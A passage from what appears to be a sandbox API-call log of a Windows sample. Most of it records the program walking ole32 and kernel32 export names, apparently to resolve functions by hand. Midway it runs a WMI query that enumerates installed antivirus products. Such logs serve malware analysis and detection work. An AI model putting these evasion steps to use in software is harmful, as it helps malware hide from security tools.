lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0035.184] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0035.184] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0035.184] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0035.185] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0035.185] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0035.185] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0035.185] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoAddRefServerProcess" | out: lpString1="CoAddRefServerProcess") returned="CoAddRefServerProcess" [0035.185] lstrlenA (lpString="COADDREFSERVERPROCESS") returned 21 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoAllowSetForegroundWindow" | out: lpString1="CoAllowSetForegroundWindow") returned="CoAllowSetForegroundWindow" [0035.185] lstrlenA (lpString="COALLOWSETFOREGROUNDWINDOW") returned 26 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoBuildVersion" | out: lpString1="CoBuildVersion") returned="CoBuildVersion" [0035.185] lstrlenA (lpString="COBUILDVERSION") returned 14 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCancelCall" | out: lpString1="CoCancelCall") returned="CoCancelCall" [0035.185] lstrlenA (lpString="COCANCELCALL") returned 12 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCopyProxy" | out: lpString1="CoCopyProxy") returned="CoCopyProxy" [0035.185] lstrlenA (lpString="COCOPYPROXY") returned 11 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCreateFreeThreadedMarshaler" | out: lpString1="CoCreateFreeThreadedMarshaler") returned="CoCreateFreeThreadedMarshaler" [0035.185] lstrlenA (lpString="COCREATEFREETHREADEDMARSHALER") returned 29 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCreateGuid" | out: lpString1="CoCreateGuid") returned="CoCreateGuid" [0035.185] lstrlenA (lpString="COCREATEGUID") returned 12 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCreateInstance" | out: lpString1="CoCreateInstance") returned="CoCreateInstance" [0035.185] lstrlenA (lpString="COCREATEINSTANCE") returned 16 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCreateInstanceEx" | out: lpString1="CoCreateInstanceEx") returned="CoCreateInstanceEx" [0035.185] lstrlenA (lpString="COCREATEINSTANCEEX") returned 18 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoCreateObjectInContext" | out: lpString1="CoCreateObjectInContext") returned="CoCreateObjectInContext" [0035.185] lstrlenA (lpString="COCREATEOBJECTINCONTEXT") returned 23 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoDeactivateObject" | out: lpString1="CoDeactivateObject") returned="CoDeactivateObject" [0035.185] lstrlenA (lpString="CODEACTIVATEOBJECT") returned 18 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoDisableCallCancellation" | out: lpString1="CoDisableCallCancellation") returned="CoDisableCallCancellation" [0035.185] lstrlenA (lpString="CODISABLECALLCANCELLATION") returned 25 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoDisconnectContext" | out: lpString1="CoDisconnectContext") returned="CoDisconnectContext" [0035.185] lstrlenA (lpString="CODISCONNECTCONTEXT") returned 19 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoDisconnectObject" | out: lpString1="CoDisconnectObject") returned="CoDisconnectObject" [0035.185] lstrlenA (lpString="CODISCONNECTOBJECT") returned 18 [0035.185] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoDosDateTimeToFileTime" | out: lpString1="CoDosDateTimeToFileTime") returned="CoDosDateTimeToFileTime" [0035.186] lstrlenA (lpString="CODOSDATETIMETOFILETIME") returned 23 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoEnableCallCancellation" | out: lpString1="CoEnableCallCancellation") returned="CoEnableCallCancellation" [0035.186] lstrlenA (lpString="COENABLECALLCANCELLATION") returned 24 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFileTimeNow" | out: lpString1="CoFileTimeNow") returned="CoFileTimeNow" [0035.186] lstrlenA (lpString="COFILETIMENOW") returned 13 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFileTimeToDosDateTime" | out: lpString1="CoFileTimeToDosDateTime") returned="CoFileTimeToDosDateTime" [0035.186] lstrlenA (lpString="COFILETIMETODOSDATETIME") returned 23 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFreeAllLibraries" | out: lpString1="CoFreeAllLibraries") returned="CoFreeAllLibraries" [0035.186] lstrlenA (lpString="COFREEALLLIBRARIES") returned 18 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFreeLibrary" | out: lpString1="CoFreeLibrary") returned="CoFreeLibrary" [0035.186] lstrlenA (lpString="COFREELIBRARY") returned 13 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFreeUnusedLibraries" | out: lpString1="CoFreeUnusedLibraries") returned="CoFreeUnusedLibraries" [0035.186] lstrlenA (lpString="COFREEUNUSEDLIBRARIES") returned 21 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoFreeUnusedLibrariesEx" | out: lpString1="CoFreeUnusedLibrariesEx") returned="CoFreeUnusedLibrariesEx" [0035.186] lstrlenA (lpString="COFREEUNUSEDLIBRARIESEX") returned 23 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetActivationState" | out: lpString1="CoGetActivationState") returned="CoGetActivationState" [0035.186] lstrlenA (lpString="COGETACTIVATIONSTATE") returned 20 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetApartmentID" | out: lpString1="CoGetApartmentID") returned="CoGetApartmentID" [0035.186] lstrlenA (lpString="COGETAPARTMENTID") returned 16 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetApartmentType" | out: lpString1="CoGetApartmentType") returned="CoGetApartmentType" [0035.186] lstrlenA (lpString="COGETAPARTMENTTYPE") returned 18 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCallContext" | out: lpString1="CoGetCallContext") returned="CoGetCallContext" [0035.186] lstrlenA (lpString="COGETCALLCONTEXT") returned 16 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCallState" | out: lpString1="CoGetCallState") returned="CoGetCallState" [0035.186] lstrlenA (lpString="COGETCALLSTATE") returned 14 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCallerTID" | out: lpString1="CoGetCallerTID") returned="CoGetCallerTID" [0035.186] lstrlenA (lpString="COGETCALLERTID") returned 14 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCancelObject" | out: lpString1="CoGetCancelObject") returned="CoGetCancelObject" [0035.186] lstrlenA (lpString="COGETCANCELOBJECT") returned 17 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetClassObject" | out: lpString1="CoGetClassObject") returned="CoGetClassObject" [0035.186] lstrlenA (lpString="COGETCLASSOBJECT") returned 16 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetClassVersion" | out: lpString1="CoGetClassVersion") returned="CoGetClassVersion" [0035.186] lstrlenA (lpString="COGETCLASSVERSION") returned 17 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetComCatalog" | out: lpString1="CoGetComCatalog") returned="CoGetComCatalog" [0035.186] lstrlenA (lpString="COGETCOMCATALOG") returned 15 [0035.186] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetContextToken" | out: lpString1="CoGetContextToken") returned="CoGetContextToken" [0035.186] lstrlenA (lpString="COGETCONTEXTTOKEN") returned 17 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCurrentLogicalThreadId" | out: lpString1="CoGetCurrentLogicalThreadId") returned="CoGetCurrentLogicalThreadId" [0035.187] lstrlenA (lpString="COGETCURRENTLOGICALTHREADID") returned 27 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetCurrentProcess" | out: lpString1="CoGetCurrentProcess") returned="CoGetCurrentProcess" [0035.187] lstrlenA (lpString="COGETCURRENTPROCESS") returned 19 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetDefaultContext" | out: lpString1="CoGetDefaultContext") returned="CoGetDefaultContext" [0035.187] lstrlenA (lpString="COGETDEFAULTCONTEXT") returned 19 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetInstanceFromFile" | out: lpString1="CoGetInstanceFromFile") returned="CoGetInstanceFromFile" [0035.187] lstrlenA (lpString="COGETINSTANCEFROMFILE") returned 21 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetInstanceFromIStorage" | out: lpString1="CoGetInstanceFromIStorage") returned="CoGetInstanceFromIStorage" [0035.187] lstrlenA (lpString="COGETINSTANCEFROMISTORAGE") returned 25 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetInterceptor" | out: lpString1="CoGetInterceptor") returned="CoGetInterceptor" [0035.187] lstrlenA (lpString="COGETINTERCEPTOR") returned 16 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetInterceptorFromTypeInfo" | out: lpString1="CoGetInterceptorFromTypeInfo") returned="CoGetInterceptorFromTypeInfo" [0035.187] lstrlenA (lpString="COGETINTERCEPTORFROMTYPEINFO") returned 28 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetInterfaceAndReleaseStream" | out: lpString1="CoGetInterfaceAndReleaseStream") returned="CoGetInterfaceAndReleaseStream" [0035.187] lstrlenA (lpString="COGETINTERFACEANDRELEASESTREAM") returned 30 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetMalloc" | out: lpString1="CoGetMalloc") returned="CoGetMalloc" [0035.187] lstrlenA (lpString="COGETMALLOC") returned 11 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetMarshalSizeMax" | out: lpString1="CoGetMarshalSizeMax") returned="CoGetMarshalSizeMax" [0035.187] lstrlenA (lpString="COGETMARSHALSIZEMAX") returned 19 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetModuleType" | out: lpString1="CoGetModuleType") returned="CoGetModuleType" [0035.187] lstrlenA (lpString="COGETMODULETYPE") returned 15 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetObject" | out: lpString1="CoGetObject") returned="CoGetObject" [0035.187] lstrlenA (lpString="COGETOBJECT") returned 11 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetObjectContext" | out: lpString1="CoGetObjectContext") returned="CoGetObjectContext" [0035.187] lstrlenA (lpString="COGETOBJECTCONTEXT") returned 18 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetPSClsid" | out: lpString1="CoGetPSClsid") returned="CoGetPSClsid" [0035.187] lstrlenA (lpString="COGETPSCLSID") returned 12 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetProcessIdentifier" | out: lpString1="CoGetProcessIdentifier") returned="CoGetProcessIdentifier" [0035.187] lstrlenA (lpString="COGETPROCESSIDENTIFIER") returned 22 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetStandardMarshal" | out: lpString1="CoGetStandardMarshal") returned="CoGetStandardMarshal" [0035.187] lstrlenA (lpString="COGETSTANDARDMARSHAL") returned 20 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetStdMarshalEx" | out: lpString1="CoGetStdMarshalEx") returned="CoGetStdMarshalEx" [0035.187] lstrlenA (lpString="COGETSTDMARSHALEX") returned 17 [0035.187] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetSystemSecurityPermissions" | out: lpString1="CoGetSystemSecurityPermissions") returned="CoGetSystemSecurityPermissions" [0035.187] lstrlenA (lpString="COGETSYSTEMSECURITYPERMISSIONS") returned 30 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoGetTreatAsClass" | out: lpString1="CoGetTreatAsClass") returned="CoGetTreatAsClass" [0035.188] lstrlenA (lpString="COGETTREATASCLASS") returned 17 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoImpersonateClient" | out: lpString1="CoImpersonateClient") returned="CoImpersonateClient" [0035.188] lstrlenA (lpString="COIMPERSONATECLIENT") returned 19 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInitialize" | out: lpString1="CoInitialize") returned="CoInitialize" [0035.188] lstrlenA (lpString="COINITIALIZE") returned 12 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInitializeEx" | out: lpString1="CoInitializeEx") returned="CoInitializeEx" [0035.188] lstrlenA (lpString="COINITIALIZEEX") returned 14 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInitializeSecurity" | out: lpString1="CoInitializeSecurity") returned="CoInitializeSecurity" [0035.188] lstrlenA (lpString="COINITIALIZESECURITY") returned 20 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInitializeWOW" | out: lpString1="CoInitializeWOW") returned="CoInitializeWOW" [0035.188] lstrlenA (lpString="COINITIALIZEWOW") returned 15 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInstall" | out: lpString1="CoInstall") returned="CoInstall" [0035.188] lstrlenA (lpString="COINSTALL") returned 9 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoInvalidateRemoteMachineBindings" | out: lpString1="CoInvalidateRemoteMachineBindings") returned="CoInvalidateRemoteMachineBindings" [0035.188] lstrlenA (lpString="COINVALIDATEREMOTEMACHINEBINDINGS") returned 33 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoIsHandlerConnected" | out: lpString1="CoIsHandlerConnected") returned="CoIsHandlerConnected" [0035.188] lstrlenA (lpString="COISHANDLERCONNECTED") returned 20 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoIsOle1Class" | out: lpString1="CoIsOle1Class") returned="CoIsOle1Class" [0035.188] lstrlenA (lpString="COISOLE1CLASS") returned 13 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoLoadLibrary" | out: lpString1="CoLoadLibrary") returned="CoLoadLibrary" [0035.188] lstrlenA (lpString="COLOADLIBRARY") returned 13 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoLockObjectExternal" | out: lpString1="CoLockObjectExternal") returned="CoLockObjectExternal" [0035.188] lstrlenA (lpString="COLOCKOBJECTEXTERNAL") returned 20 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoMarshalHresult" | out: lpString1="CoMarshalHresult") returned="CoMarshalHresult" [0035.188] lstrlenA (lpString="COMARSHALHRESULT") returned 16 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoMarshalInterThreadInterfaceInStream" | out: lpString1="CoMarshalInterThreadInterfaceInStream") returned="CoMarshalInterThreadInterfaceInStream" [0035.188] lstrlenA (lpString="COMARSHALINTERTHREADINTERFACEINSTREAM") returned 37 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoMarshalInterface" | out: lpString1="CoMarshalInterface") returned="CoMarshalInterface" [0035.188] lstrlenA (lpString="COMARSHALINTERFACE") returned 18 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoPopServiceDomain" | out: lpString1="CoPopServiceDomain") returned="CoPopServiceDomain" [0035.188] lstrlenA (lpString="COPOPSERVICEDOMAIN") returned 18 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoPushServiceDomain" | out: lpString1="CoPushServiceDomain") returned="CoPushServiceDomain" [0035.188] lstrlenA (lpString="COPUSHSERVICEDOMAIN") returned 19 [0035.188] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoQueryAuthenticationServices" | out: lpString1="CoQueryAuthenticationServices") returned="CoQueryAuthenticationServices" [0035.188] lstrlenA (lpString="COQUERYAUTHENTICATIONSERVICES") returned 29 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoQueryClientBlanket" | out: lpString1="CoQueryClientBlanket") returned="CoQueryClientBlanket" [0035.189] lstrlenA (lpString="COQUERYCLIENTBLANKET") returned 20 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoQueryProxyBlanket" | out: lpString1="CoQueryProxyBlanket") returned="CoQueryProxyBlanket" [0035.189] lstrlenA (lpString="COQUERYPROXYBLANKET") returned 19 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoQueryReleaseObject" | out: lpString1="CoQueryReleaseObject") returned="CoQueryReleaseObject" [0035.189] lstrlenA (lpString="COQUERYRELEASEOBJECT") returned 20 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoReactivateObject" | out: lpString1="CoReactivateObject") returned="CoReactivateObject" [0035.189] lstrlenA (lpString="COREACTIVATEOBJECT") returned 18 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterChannelHook" | out: lpString1="CoRegisterChannelHook") returned="CoRegisterChannelHook" [0035.189] lstrlenA (lpString="COREGISTERCHANNELHOOK") returned 21 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterClassObject" | out: lpString1="CoRegisterClassObject") returned="CoRegisterClassObject" [0035.189] lstrlenA (lpString="COREGISTERCLASSOBJECT") returned 21 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterInitializeSpy" | out: lpString1="CoRegisterInitializeSpy") returned="CoRegisterInitializeSpy" [0035.189] lstrlenA (lpString="COREGISTERINITIALIZESPY") returned 23 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterMallocSpy" | out: lpString1="CoRegisterMallocSpy") returned="CoRegisterMallocSpy" [0035.189] lstrlenA (lpString="COREGISTERMALLOCSPY") returned 19 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterMessageFilter" | out: lpString1="CoRegisterMessageFilter") returned="CoRegisterMessageFilter" [0035.189] lstrlenA (lpString="COREGISTERMESSAGEFILTER") returned 23 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterPSClsid" | out: lpString1="CoRegisterPSClsid") returned="CoRegisterPSClsid" [0035.189] lstrlenA (lpString="COREGISTERPSCLSID") returned 17 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterSurrogate" | out: lpString1="CoRegisterSurrogate") returned="CoRegisterSurrogate" [0035.189] lstrlenA (lpString="COREGISTERSURROGATE") returned 19 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRegisterSurrogateEx" | out: lpString1="CoRegisterSurrogateEx") returned="CoRegisterSurrogateEx" [0035.189] lstrlenA (lpString="COREGISTERSURROGATEEX") returned 21 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoReleaseMarshalData" | out: lpString1="CoReleaseMarshalData") returned="CoReleaseMarshalData" [0035.189] lstrlenA (lpString="CORELEASEMARSHALDATA") returned 20 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoReleaseServerProcess" | out: lpString1="CoReleaseServerProcess") returned="CoReleaseServerProcess" [0035.189] lstrlenA (lpString="CORELEASESERVERPROCESS") returned 22 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoResumeClassObjects" | out: lpString1="CoResumeClassObjects") returned="CoResumeClassObjects" [0035.189] lstrlenA (lpString="CORESUMECLASSOBJECTS") returned 20 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRetireServer" | out: lpString1="CoRetireServer") returned="CoRetireServer" [0035.189] lstrlenA (lpString="CORETIRESERVER") returned 14 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRevertToSelf" | out: lpString1="CoRevertToSelf") returned="CoRevertToSelf" [0035.189] lstrlenA (lpString="COREVERTTOSELF") returned 14 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRevokeClassObject" | out: lpString1="CoRevokeClassObject") returned="CoRevokeClassObject" [0035.189] lstrlenA (lpString="COREVOKECLASSOBJECT") returned 19 [0035.189] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRevokeInitializeSpy" | out: lpString1="CoRevokeInitializeSpy") returned="CoRevokeInitializeSpy" [0035.190] lstrlenA (lpString="COREVOKEINITIALIZESPY") returned 21 [0035.190] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoRevokeMallocSpy" | out: lpString1="CoRevokeMallocSpy") returned="CoRevokeMallocSpy" [0035.190] lstrlenA (lpString="COREVOKEMALLOCSPY") returned 17 [0035.190] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoSetCancelObject" | out: lpString1="CoSetCancelObject") returned="CoSetCancelObject" [0035.190] lstrlenA (lpString="COSETCANCELOBJECT") returned 17 [0035.190] lstrcpyA (in: lpString1=0xc9dc28, lpString2="CoSetProxyBlanket" | out: lpString1="CoSetProxyBlanket") returned="CoSetProxyBlanket" [0035.190] lstrlenA (lpString="COSETPROXYBLANKET") returned 17 [0035.190] CoSetProxyBlanket (pProxy=0x31cfe4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0035.190] IWbemServices:ExecQuery (in: This=0x31cfe4, strQueryLanguage="WQL", strQuery="Select * From AntiVirusPr", lFlags=32, pCtx=0x0, ppEnum=0x1b000c | out: ppEnum=0x1b000c*=0x31c754) returned 0x0 [0035.204] IEnumWbemClassObject:Next (in: This=0x31c754, lTimeout=-1, uCount=0x1, apObjects=0xc9e890, puReturned=0xc9e894 | out: apObjects=0xc9e890*=0x0, puReturned=0xc9e894*=0x0) returned 0x1 [0035.207] lstrlenA (lpString="kernel32.dll") returned 12 [0035.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0035.207] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0035.207] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0035.207] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0035.207] lstrlenA (lpString="ADDATOMA") returned 8 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0035.207] lstrlenA (lpString="ADDATOMW") returned 8 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0035.207] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0035.207] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0035.207] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0035.207] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0035.207] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0035.207] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0035.208] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0035.208] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0035.208] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0035.208] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0035.208] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0035.208] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0035.208] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0035.208] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0035.208] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0035.208] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0035.208] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0035.208] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0035.208] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0035.208] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0035.208] lstrlenA (lpString="BACKUPREAD") returned 10 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0035.208] lstrlenA (lpString="BACKUPSEEK") returned 10 [0035.208] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0035.208] lstrlenA (lpString="BACKUPWRITE") returned 11 [0035.209] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BaseCheckAppcompatCache" | 